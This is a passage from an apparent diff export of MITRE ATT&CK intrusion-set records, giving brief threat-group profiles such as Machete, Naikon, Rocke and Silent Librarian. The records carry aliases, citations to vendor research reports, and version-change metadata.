DEFENCE MINISTERS\u2019 MEETING AND ASSOCIATES. Retrieved November 17, 2024.", + "url": "https://web.archive.org/web/20190508165226/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf" + }, + { + "source_name": "Spring Dragon Jun 2015", + "description": "Baumgartner, K.. (2015, June 17). The Spring Dragon APT. Retrieved February 15, 2016.", + "url": "https://securelist.com/the-spring-dragon-apt/70726/" + }, + { + "source_name": "Lotus Blossom Jun 2015", + "description": "Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.", + "url": "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html" + }, + { + "source_name": "Cisco LotusBlossom 2025", + "description": "Joey Chen, Cisco Talos. (2025, February 27). Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools. Retrieved March 15, 2025.", + "url": "https://blog.talosintelligence.com/lotus-blossom-espionage-group/" + }, + { + "source_name": "Microsoft Threat Actor Naming July 2023", + "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.", + "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide" + }, + { + "source_name": "Symantec Bilbug 2022", + "description": "Symntec Threat Hunter Team. (2022, November 12). Billbug: State-sponsored Actor Targets Cert Authority, Government Agencies in Multiple Asian Countries. Retrieved March 15, 2025.", + "url": "https://www.security.com/threat-intelligence/espionage-asia-governments-cert-authority" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Prinesha Dobariya" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "4.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Prinesha Dobariya\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-23 21:20:58.367000+00:00\", \"old_value\": \"2025-04-04 17:35:44.589000+00:00\"}}}", + "previous_version": "4.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-13 12:37:10.394000+00:00", + "modified": "2025-04-25 14:49:22.323000+00:00", + "name": "Machete", + "description": "[Machete](https://attack.mitre.org/groups/G0095) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. [Machete](https://attack.mitre.org/groups/G0095) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)", + "aliases": [ + "Machete", + "APT-C-43", + "El Machete" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0095", + "external_id": "G0095" + }, + { + "source_name": "Machete", + "description": "(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(" + }, + { + "source_name": "APT-C-43", + "description": "(Citation: 360 Machete Sep 2020)" + }, + { + "source_name": "El Machete", + "description": "(Citation: Cylance Machete Mar 2017)" + }, + { + "source_name": "Cylance Machete Mar 2017", + "description": "The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.", + "url": "https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html" + }, + { + "source_name": "Securelist Machete Aug 2014", + "description": "Kaspersky Global Research and Analysis Team. (2014, August 20). El Machete. Retrieved September 13, 2019.", + "url": "https://securelist.com/el-machete/66108/" + }, + { + "source_name": "ESET Machete July 2019", + "description": "ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf" + }, + { + "source_name": "360 Machete Sep 2020", + "description": "kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries \u2014 HpReact campaign. Retrieved November 20, 2020.", + "url": "https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matias Nicolas Porolli, ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:22.323000+00:00\", \"old_value\": \"2025-04-16 20:37:37.929000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--2e5d3a83-fe00-41a5-9b60-237efc84832f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:46.025000+00:00", + "modified": "2025-04-25 14:49:46.105000+00:00", + "name": "Moafee", + "description": "[Moafee](https://attack.mitre.org/groups/G0002) is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://attack.mitre.org/groups/G0017). (Citation: Haq 2014)", + "aliases": [ + "Moafee" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0002", + "external_id": "G0002" + }, + { + "source_name": "Moafee", + "description": "(Citation: Haq 2014)" + }, + { + "source_name": "Haq 2014", + "description": "Haq, T., Moran, N., Scott, M., & Vashisht, S. O. (2014, September 10). The Path to Mass-Producing Cyber Attacks [Blog]. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:46.105000+00:00\", \"old_value\": \"2025-04-16 20:37:41.833000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--025bdaa9-897d-4bad-afa6-013ba5734653", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:49:46.469000+00:00", + "name": "NEODYMIUM", + "description": "[NEODYMIUM](https://attack.mitre.org/groups/G0055) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://attack.mitre.org/groups/G0056) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21) [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)", + "aliases": [ + "NEODYMIUM" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0055", + "external_id": "G0055" + }, + { + "source_name": "NEODYMIUM", + "description": "(Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)" + }, + { + "source_name": "Microsoft NEODYMIUM Dec 2016", + "description": "Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.", + "url": "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/" + }, + { + "source_name": "Microsoft SIR Vol 21", + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", + "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + }, + { + "source_name": "CyberScoop BlackOasis Oct 2017", + "description": "Bing, C. (2017, October 16). Middle Eastern hacking group is using FinFisher malware to conduct international espionage. Retrieved February 15, 2018.", + "url": "https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:46.469000+00:00\", \"old_value\": \"2025-04-16 20:37:41.988000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:54.232000+00:00", + "modified": "2025-04-25 14:49:21.044000+00:00", + "name": "Naikon", + "description": "[Naikon](https://attack.mitre.org/groups/G0019) is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People\u2019s Liberation Army\u2019s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020).(Citation: CameraShy) Active since at least 2010, [Naikon](https://attack.mitre.org/groups/G0019) has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN).(Citation: CameraShy)(Citation: Baumgartner Naikon 2015) \n\nWhile [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: Baumgartner Golovkin Naikon 2015)", + "aliases": [ + "Naikon" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0019", + "external_id": "G0019" + }, + { + "source_name": "Naikon", + "description": "(Citation: Baumgartner Naikon 2015)(Citation: CameraShy)(Citation: Baumgartner Golovkin Naikon 2015)" + }, + { + "source_name": "CameraShy", + "description": "ThreatConnect Inc. and Defense Group Inc. (DGI). (2015, September 23). Project CameraShy: Closing the Aperture on China's Unit 78020. Retrieved December 17, 2015.", + "url": "http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf" + }, + { + "source_name": "Baumgartner Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + }, + { + "source_name": "Baumgartner Golovkin Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May 14). The Naikon APT. Retrieved January 14, 2015.", + "url": "https://securelist.com/the-naikon-apt/69953/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:21.044000+00:00\", \"old_value\": \"2025-04-16 20:37:37.579000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--f9c06633-dcff-48a1-8588-759e7cec5694", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:49:07.040000+00:00", + "name": "PLATINUM", + "description": "[PLATINUM](https://attack.mitre.org/groups/G0068) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. (Citation: Microsoft PLATINUM April 2016)", + "aliases": [ + "PLATINUM" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0068", + "external_id": "G0068" + }, + { + "source_name": "PLATINUM", + "description": "(Citation: Microsoft PLATINUM April 2016)" + }, + { + "source_name": "Microsoft PLATINUM April 2016", + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.", + "url": "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:07.040000+00:00\", \"old_value\": \"2025-04-16 20:37:35.512000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--fe98767f-9df8-42b9-83c9-004b1dec8647", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:50.198000+00:00", + "modified": "2025-04-25 14:49:38.981000+00:00", + "name": "PittyTiger", + "description": "[PittyTiger](https://attack.mitre.org/groups/G0011) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.(Citation: Bizeul 2014)(Citation: Villeneuve 2014)", + "aliases": [ + "PittyTiger" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0011", + "external_id": "G0011" + }, + { + "source_name": "PittyTiger", + "description": "(Citation: Bizeul 2014) (Citation: Villeneuve 2014)" + }, + { + "source_name": "Bizeul 2014", + "description": "Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Pernet, C. (2014, July 11). Eye of the Tiger. Retrieved September 29, 2015.", + "url": "https://airbus-cyber-security.com/the-eye-of-the-tiger/" + }, + { + "source_name": "Villeneuve 2014", + "description": "Villeneuve, N., Homan, J. (2014, July 31). Spy of the Tiger. Retrieved September 29, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:38.981000+00:00\", \"old_value\": \"2025-04-16 20:37:40.885000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--7ecc3b4f-5cdb-457e-b55a-df376b359446", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:04.179000+00:00", + "modified": "2025-04-25 14:49:33.223000+00:00", + "name": "Poseidon Group", + "description": "[Poseidon Group](https://attack.mitre.org/groups/G0033) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://attack.mitre.org/groups/G0033) as a security firm. (Citation: Kaspersky Poseidon Group)", + "aliases": [ + "Poseidon Group" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0033", + "external_id": "G0033" + }, + { + "source_name": "Poseidon Group", + "description": "(Citation: Kaspersky Poseidon Group)" + }, + { + "source_name": "Kaspersky Poseidon Group", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2016, February 9). Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage. Retrieved March 16, 2016.", + "url": "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:33.223000+00:00\", \"old_value\": \"2025-04-16 20:37:39.948000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:10.206000+00:00", + "modified": "2025-04-25 14:49:01.288000+00:00", + "name": "RTM", + "description": "[RTM](https://attack.mitre.org/groups/G0048) is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://attack.mitre.org/software/S0148)). (Citation: ESET RTM Feb 2017)", + "aliases": [ + "RTM" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0048", + "external_id": "G0048" + }, + { + "source_name": "RTM", + "description": "(Citation: ESET RTM Feb 2017)" + }, + { + "source_name": "ESET RTM Feb 2017", + "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Oleg Skulkin, Group-IB" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:01.288000+00:00\", \"old_value\": \"2025-04-16 20:37:34.877000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-26 14:20:20.623000+00:00", + "modified": "2025-04-25 14:49:08.821000+00:00", + "name": "Rocke", + "description": "[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address \"rocke@live.cn\" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)", + "aliases": [ + "Rocke" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0106", + "external_id": "G0106" + }, + { + "source_name": "Talos Rocke August 2018", + "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.", + "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:08.821000+00:00\", \"old_value\": \"2025-04-16 20:37:36.004000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--c5574ca0-d5a4-490a-b207-e4658e5fd1d7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:00.677000+00:00", + "modified": "2025-04-25 14:49:45.222000+00:00", + "name": "Scarlet Mimic", + "description": "[Scarlet Mimic](https://attack.mitre.org/groups/G0029) is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group's motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029) and [Putter Panda](https://attack.mitre.org/groups/G0024), it has not been concluded that the groups are the same. (Citation: Scarlet Mimic Jan 2016)", + "aliases": [ + "Scarlet Mimic" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0029", + "external_id": "G0029" + }, + { + "source_name": "Scarlet Mimic", + "description": "(Citation: Scarlet Mimic Jan 2016)" + }, + { + "source_name": "Scarlet Mimic Jan 2016", + "description": "Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:45.222000+00:00\", \"old_value\": \"2025-04-16 20:37:41.499000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--90784c1e-4aba-40eb-9adf-7556235e6384", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-02-03 16:36:38.145000+00:00", + "modified": "2025-04-25 14:49:29.613000+00:00", + "name": "Silent Librarian", + "description": "[Silent Librarian](https://attack.mitre.org/groups/G0122) is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of [Silent Librarian](https://attack.mitre.org/groups/G0122) are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC).(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Malwarebytes Silent Librarian October 2020)", + "aliases": [ + "Silent Librarian", + "TA407", + "COBALT DICKENS" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0122", + "external_id": "G0122" + }, + { + "source_name": "TA407", + "description": "(Citation: Proofpoint TA407 September 2019)(Citation: Malwarebytes Silent Librarian October 2020)" + }, + { + "source_name": "COBALT DICKENS", + "description": "(Citation: Secureworks COBALT DICKENS August 2018)(Citation: Secureworks COBALT DICKENS September 2019)(Citation: Proofpoint TA407 September 2019)(Citation: Malwarebytes Silent Librarian October 2020)" + }, + { + "source_name": "DOJ Iran Indictments March 2018", + "description": "DOJ. (2018, March 23). U.S. v. Rafatnejad et al . Retrieved February 3, 2021.", + "url": "https://www.justice.gov/usao-sdny/press-release/file/1045781/download" + }, + { + "source_name": "Phish Labs Silent Librarian", + "description": "Hassold, Crane. (2018, March 26). Silent Librarian: More to the Story of the Iranian Mabna Institute Indictment. Retrieved February 3, 2021.", + "url": "https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment" + }, + { + "source_name": "Malwarebytes Silent Librarian October 2020", + "description": "Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.", + "url": "https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/" + }, + { + "source_name": "Proofpoint TA407 September 2019", + "description": "Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.", + "url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian" + }, + { + "source_name": "Secureworks COBALT DICKENS August 2018", + "description": "Counter Threat Unit Research Team. (2018, August 24). Back to School: COBALT DICKENS Targets Universities. Retrieved February 3, 2021.", + "url": "https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities" + }, + { + "source_name": "Secureworks COBALT DICKENS September 2019", + "description": "Counter Threat Unit Research Team. (2019, September 11). COBALT DICKENS Goes Back to School\u2026Again. Retrieved February 3, 2021.", + "url": "https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:29.613000+00:00\", \"old_value\": \"2025-04-16 20:37:39.188000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--d1acfbb3-647b-4723-9154-800ec119006e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:49:21.603000+00:00", + "name": "Sowbug", + "description": "[Sowbug](https://attack.mitre.org/groups/G0054) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. (Citation: Symantec Sowbug Nov 2017)", + "aliases": [ + "Sowbug" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0054", + "external_id": "G0054" + }, + { + "source_name": "Sowbug", + "description": "(Citation: Symantec Sowbug Nov 2017)" + }, + { + "source_name": "Symantec Sowbug Nov 2017", + "description": "Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.", + "url": "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Alan Neville, @abnev" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:21.603000+00:00\", \"old_value\": \"2025-04-16 20:37:37.765000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--894aab42-3371-47b1-8859-a4a074c804c8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:06.390000+00:00", + "modified": "2025-04-25 14:49:04.710000+00:00", + "name": "Stealth Falcon", + "description": "[Stealth 